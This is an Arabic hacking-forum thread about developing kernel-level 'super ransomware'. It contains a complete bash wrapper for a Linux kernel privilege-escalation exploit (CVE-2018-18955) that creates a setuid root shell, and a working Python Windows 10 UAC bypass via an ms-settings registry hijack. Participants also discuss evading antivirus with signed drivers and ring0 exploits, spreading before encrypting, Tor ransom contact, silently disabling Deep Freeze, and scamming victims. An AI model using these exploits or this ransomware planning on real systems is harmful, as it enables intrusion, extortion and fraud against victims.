[ نقاش ] تطوير Super Ransomware

تم تحميل الصفحة في 0,2271416 ثانية
تطوير Super Ransomware
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
اعتقد هذا يحتاج التعامل بشكل مباشر مع السجل عن طريق الـ Pointer وتطوير الدرايفرات ليس لها صله بالكيرنل .

تقصد تطويره بالاتصال المباشر واللغات التي تتصل به هيا C and C plus plus

التعامل المباشر مع الهاردوير وليس الكيرنل ..
كيف ستتعامل مباشرة مع الهاردوير بدون البرمجة في الـ kernel mode
بخصوص
linux اكثر الفايروسات تستغل ثغرات privilege escalation وهي تصيب kernel للحصول على صلاحية root على السيرفر
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
احدى الثغرات الجديده في kernel ubuntu
Bash:
#!/bin/sh
# wrapper for Jann Horn's exploit for CVE-2018-18955
# uses polkit technique
# ---
# [email protected]:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh
# [*] Compiling...
# [*] Creating /usr/share/polkit-1/actions/subuid.policy...
# [.] starting
# [.] setting up namespace
# [~] done, namespace sandbox set up
# [.] mapping subordinate ids
# [.] subuid: 165536
# [.] subgid: 165536
# [~] done, mapped subordinate ids
# [.] executing subshell
# [*] Launching pkexec...
# [+] Success:
# -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh
# [*] Cleaning up...
# [*] Launching root shell: /tmp/sh
# [email protected]:~/kernel-exploits/CVE-2018-18955# id
# uid=0(root) gid=0(root) groups=0(root),1001(test)

rootshell="/tmp/sh"
policy="subuid.policy"

command_exists() {
  command -v "${1}" >/dev/null 2>/dev/null
}

if ! command_exists gcc; then
  echo '[-] gcc is not installed'
  exit 1
fi

if ! command_exists /usr/bin/pkexec; then
  echo '[-] pkexec is not installed'
  exit 1
fi

if ! command_exists /usr/bin/newuidmap; then
  echo '[-] newuidmap is not installed'
  exit 1
fi

if ! command_exists /usr/bin/newgidmap; then
  echo '[-] newgidmap is not installed'
  exit 1
fi

if ! test -w .; then
  echo '[-] working directory is not writable'
  exit 1
fi

echo "[*] Compiling..."

if ! gcc subuid_shell.c -o subuid_shell; then
  echo 'Compiling subuid_shell.c failed'
  exit 1
fi

if ! gcc subshell.c -o subshell; then
  echo 'Compiling gcc_subshell.c failed'
  exit 1
fi

if ! gcc rootshell.c -o "${rootshell}"; then
  echo 'Compiling rootshell.c failed'
  exit 1
fi

echo "[*] Creating /usr/share/polkit-1/actions/${policy}..."

echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE policyconfig PUBLIC
  "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
  "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">
<policyconfig>
  <action id="org.freedesktop.policykit.exec">
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>
  </action>
</policyconfig>' > "${policy}"

echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell

if ! test -r "/usr/share/polkit-1/actions/${policy}"; then
  echo '[-] Failed'
  /bin/rm "${rootshell}"
  exit 1
fi

echo "[*] Launching pkexec..."

/usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}"

if ! test -u "${rootshell}"; then
  echo '[-] Failed'
  /bin/rm "${rootshell}"
  exit 1
fi

echo '[+] Success:'
/bin/ls -la "${rootshell}"

echo '[*] Cleaning up...'
/bin/rm subuid_shell
/bin/rm subshell
/bin/rm "${policy}"
echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell

echo "[*] Launching root shell: ${rootshell}"
$rootshell
 

عـبـدالـله

.:: مُشرف قسم python ::.
rankrankrankrank
إنضم
5 ديسمبر 2013
المشاركات
1,629
الإعجابات
2,094
النقاط
198
الإقامة
webs1.net
شي طبيعي يجب التعامل مع الهاردوير للوصول للسوفت وير عن طريق الكيرنل

الكيرنل يربط بين الهاردوير والسوفت وير .

وماوضعته هوا اضافة مستخدم ليصبح روت مثله كمثل اعطاء تصاريح للمستخدم . او مانسميه

مافي شيئ جديد الفروق بين لينكس وويندز بالشكل والمصطلح .!


الكيرنل عباره عن استقبال وارسال فتح ممرات بين الهاردوير والسوفت وير .


لكن ماوضعته من ثغره لا ارها سوى اضافة مستخدم جديد مع تصاريح كامله .!

Creating /usr/share/polkit-1/actions/subuid.policy

برامج الاختراق تفعل ذالك . والفايروسات ايضآ .

لكن نصل للكيرنل عشان نقوم بالتعديلات ؟

اذا تم العبث بالكيرنل لن ترى الذاكره ولا حتى booting


ماوضعته اعطاء امتيازات للتحكم الكامل . بالنظام يعني اضافه بدون اذن صاحبه .

اين المشكله ؟
 

عـبـدالـله

.:: مُشرف قسم python ::.
rankrankrankrank
إنضم
5 ديسمبر 2013
المشاركات
1,629
الإعجابات
2,094
النقاط
198
الإقامة
webs1.net
هذا انا استخدمه لويندوز 10 .

Python:
import os
import sys
import ctypes
import winreg

cmd = "C:\windows\System32\cmd.exe"
def create_reg_key(key, value):
    try:
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, winreg.KEY_WRITE)
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
        winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def exec_bypass_uac(cmd):
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def bypass_uac():
try:
    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
    
    exec_bypass_uac(cmd)
    os.system(r'C:\windows\system32\ComputerDefaults.exe')
    return 1
except WindowsError:
    sys.exit(1)

if __name__ == '__main__':

    if bypass_uac():
        print("Enjoy your Admin Shell :)")
لا تقل ايضآ هيا ثغره ؟
 

discord711

Beginner Developer
rank
إنضم
2 أغسطس 2019
المشاركات
54
الإعجابات
32
النقاط
18
العمر
20
الرانسيوم من هذا النوع فتاكه للغايه
لك ان تتخيل اننى قمت بنفسى بتجربه petya فى وجود برنامج حمايه مع تفعيل وحدات الحمايه الملفات folder shield
ولم يصمد اماه برنامج الحمايه وتم تشفير كامل الهارد بجميع الداتا بداخله
اذا حاولت ان تقوم ببرمجه درايف خاص داخل الرنج0 بنفس فكرتك لن يحس برنامج الحمايه بما يحدث لان فى الاصل اظن ان folder shield يحمى الملفات فى هذه الطبقه
بالتوفيق لكن ارى انها شى يفسد ولا يصلح للاسف
كنت اتمنى ان نبحث عن طرق فعاله لفك التشفير لان ما نراه حاليا يجعلنا نعيش فى جحيم

الحل هو الديب فريز على آخر اصداراته طبعاً وعلى وندوز 10

بإعتراف الأخ حلاج لم يستطيع احد تخطيه
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
هذا انا استخدمه لويندوز 10 .

Python:
import os
import sys
import ctypes
import winreg

cmd = "C:\windows\System32\cmd.exe"
def create_reg_key(key, value):
    try:
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, winreg.KEY_WRITE)
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
        winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def exec_bypass_uac(cmd):
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def bypass_uac():
try:
    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
   
    exec_bypass_uac(cmd)
    os.system(r'C:\windows\system32\ComputerDefaults.exe')
    return 1
except WindowsError:
    sys.exit(1)

if __name__ == '__main__':

    if bypass_uac():
        print("Enjoy your Admin Shell :)")
لا تقل ايضآ هيا ثغره ؟
تخطي uac في بيئة ويندوز يختلف عن الحصول على صلاحية root في linux
uac
لاتحتاج لـ ثغرة في kernel الويندوز يتم استغلال برامج تشتغل كـ ادمن ولكن بدون ظهور uac داخل الويندوز مثل ComputerDefaults.exe , eventvwr.exe ويوجد الكثير غيرهم
في
linux مثل الثغرة الي وضعتها انا بالاعلى يتم استغلال خطأ داخل احدى الدوال في kernel الـ linux والدالة الي تم استغلالها هنا هي map_write() داخل user_namespace.c
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,044
الإعجابات
2,115
النقاط
163
الإقامة
GER/SYR-Aleppo
تقدر تخليه ينتشر قبل ما يشفر كل شي، هذا اذا طبعا حصل على صلاحيات ring0
إذا اضفت شهادة ممكن يكون موثوق بشكل أكبر
===
بالنسبة للاتصال يكفي من خلال tor لكن في كثير من الرانسومويير القديمة صار في مشكلة بالاستضافة والناس ما قدروا يكلموا المبرمج بعدين أو يدفعوا
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
شي طبيعي يجب التعامل مع الهاردوير للوصول للسوفت وير عن طريق الكيرنل

الكيرنل يربط بين الهاردوير والسوفت وير .

وماوضعته هوا اضافة مستخدم ليصبح روت مثله كمثل اعطاء تصاريح للمستخدم . او مانسميه

مافي شيئ جديد الفروق بين لينكس وويندز بالشكل والمصطلح .!


الكيرنل عباره عن استقبال وارسال فتح ممرات بين الهاردوير والسوفت وير .


لكن ماوضعته من ثغره لا ارها سوى اضافة مستخدم جديد مع تصاريح كامله .!

Creating /usr/share/polkit-1/actions/subuid.policy

برامج الاختراق تفعل ذالك . والفايروسات ايضآ .

لكن نصل للكيرنل عشان نقوم بالتعديلات ؟

اذا تم العبث بالكيرنل لن ترى الذاكره ولا حتى booting


ماوضعته اعطاء امتيازات للتحكم الكامل . بالنظام يعني اضافه بدون اذن صاحبه .

اين المشكله ؟
لم اضع الثغرة كامله انا هذا مجرد output لـ مايفعله ملف الثغرة
داخل ملف الثغرة استغلال لـ دالة
map_write() الموجوده في kernel/user_namespace.c الخاص بـ ubuntu
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
الحل هو الديب فريز على آخر اصداراته طبعاً وعلى وندوز 10

بإعتراف الأخ حلاج لم يستطيع احد تخطيه
اخي الديب فريز لاتضع كل ثقتك فيه كما رددت عليك من قبل تم تخطيه بـ ثغرة meltdown
وايضا هناك طريقة لتخطية عبر برمجة driver يقوم بتقديم تاريخ الـ bios الى 3 سنوات بعد اعادة التشغيل سيتم تعطيل الديب فريز ويمكن ازالته بشكل صامت
 

عـبـدالـله

.:: مُشرف قسم python ::.
rankrankrankrank
إنضم
5 ديسمبر 2013
المشاركات
1,629
الإعجابات
2,094
النقاط
198
الإقامة
webs1.net
واضح ان الثغره في ملف user_namespace.c

لكن الوصول للثغره يتطلب التطبيق على الجهاز local ,

C:
static ssize_t map_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos,
             int cap_setid,
             struct uid_gid_map *map,
             struct uid_gid_map *parent_map)
Linux source code: kernel/user_namespace.c (v5.2.8) - Bootlin

هذا كيرنال لينكس
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,244
الإعجابات
8,243
النقاط
113
الإقامة
الجزائر
تشفير القرص و نظام شغال عليه اشبه بعمليه قلب مفتوح
مر علي شخص واحد فقط مصري فعلا له قدره برمجياا لعملها

1- انت بحاجه ليس لدرايفر فقط بل لبرمجه نظام تشغيل من صفر
+ تنصيبه برمجيا جنب وندوز
+ حذفه و اصلاح mft & mbr
مهمه نظام تشفير و فك تشفير كل الهارد وعرض رساله ادخال المفتاح

2- انت بحاجه لتوقيع رقمي لدرايفرات ل x64 و ثغرات صلاحيات ring0 لتخطي الحمايات
3- خبره كبيره ف اسمبلي و c
 

H O U D I N I

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
14 أغسطس 2010
المشاركات
5,244
الإعجابات
8,243
النقاط
113
الإقامة
الجزائر
تشفير القرص و نظام شغال عليه اشبه بعمليه قلب مفتوح
مر علي شخص واحد فقط مصري فعلا له قدره برمجياا لعملها

1- انت بحاجه ليس لدرايفر فقط بل لبرمجه نظام تشغيل من صفر
+ تنصيبه برمجيا جنب وندوز
+ حذفه و اصلاح mft & mbr
مهمه نظام تشفير و فك تشفير كل الهارد وعرض رساله ادخال المفتاح

2- انت بحاجه لتوقيع رقمي لدرايفرات ل x64 و ثغرات صلاحيات ring0 لتخطي الحمايات
3- خبره كبيره ف اسمبلي و c
اقصد GamingMasteR
Kernel Detective v 1.4.1 - KernelMode.info
صاحب برنامج kernel detective
 

discord711

Beginner Developer
rank
إنضم
2 أغسطس 2019
المشاركات
54
الإعجابات
32
النقاط
18
العمر
20
اخي الديب فريز لاتضع كل ثقتك فيه كما رددت عليك من قبل تم تخطيه بـ ثغرة meltdown
وايضا هناك طريقة لتخطية عبر برمجة driver يقوم بتقديم تاريخ الـ bios الى 3 سنوات بعد اعادة التشغيل سيتم تعطيل الديب فريز ويمكن ازالته بشكل صامت
على آخر إصدار من الديب فريز ؟

وعلى ويندوز 10 ؟


وهل يوجد طريقة لمنعه من التخطي ؟


لانني رأيت لك مشاركة من قبل ان الديب فريز لم يتخطاه احد
 

discord711

Beginner Developer
rank
إنضم
2 أغسطس 2019
المشاركات
54
الإعجابات
32
النقاط
18
العمر
20
وجدت ثغرة الديب فريز الـ meltdown :


جاري الإبلاغ عنها لترقيعها
 

Mr.LOAI

~أستغفر الله العظيم~
rankrankrankrankrank
إنضم
28 يونيو 2016
المشاركات
2,044
الإعجابات
2,115
النقاط
163
الإقامة
GER/SYR-Aleppo

عـبـدالـله

.:: مُشرف قسم python ::.
rankrankrankrank
إنضم
5 ديسمبر 2013
المشاركات
1,629
الإعجابات
2,094
النقاط
198
الإقامة
webs1.net
😂😂😂😂😂

الله يجزاك الخير ضحكتني هههه

عسى دوم الضحكه وعساك كل عام وانت بخير .

عجبني الشخص واصراره على البحث عن الثغرات بالبرنامج لكنه متأخر شوي لو يطبق على الاصدار الجديده ربما يصل الى هدفه ويكون رمز نفتخر به .
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
تشفير القرص و نظام شغال عليه اشبه بعمليه قلب مفتوح
مر علي شخص واحد فقط مصري فعلا له قدره برمجياا لعملها

1- انت بحاجه ليس لدرايفر فقط بل لبرمجه نظام تشغيل من صفر
+ تنصيبه برمجيا جنب وندوز
+ حذفه و اصلاح mft & mbr
مهمه نظام تشفير و فك تشفير كل الهارد وعرض رساله ادخال المفتاح

2- انت بحاجه لتوقيع رقمي لدرايفرات ل x64 و ثغرات صلاحيات ring0 لتخطي الحمايات
3- خبره كبيره ف اسمبلي و c
BitLocker يستخدم قطعة TPM لتخزين المفاتيح ويعرض رسالة في بداية البوت لـ ادخال باسورد الفك
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
واضح ان الثغره في ملف user_namespace.c

لكن الوصول للثغره يتطلب التطبيق على الجهاز local ,

C:
static ssize_t map_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos,
             int cap_setid,
             struct uid_gid_map *map,
             struct uid_gid_map *parent_map)
Linux source code: kernel/user_namespace.c (v5.2.8) - Bootlin

هذا كيرنال لينكس
نعم هي privilege escalation يعني بعد اختراق السيرفر تستغل مثل هذه الثغره لكي تحصل على root
 
إنضم
29 يوليو 2011
المشاركات
7,857
الإعجابات
9,117
النقاط
155
الإقامة
المغرب
او ان تحول عملية الفيدية الى سكام و تجعل الضحية يرسل الاموال بكامل حريته و بدون تهديد :637463:
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل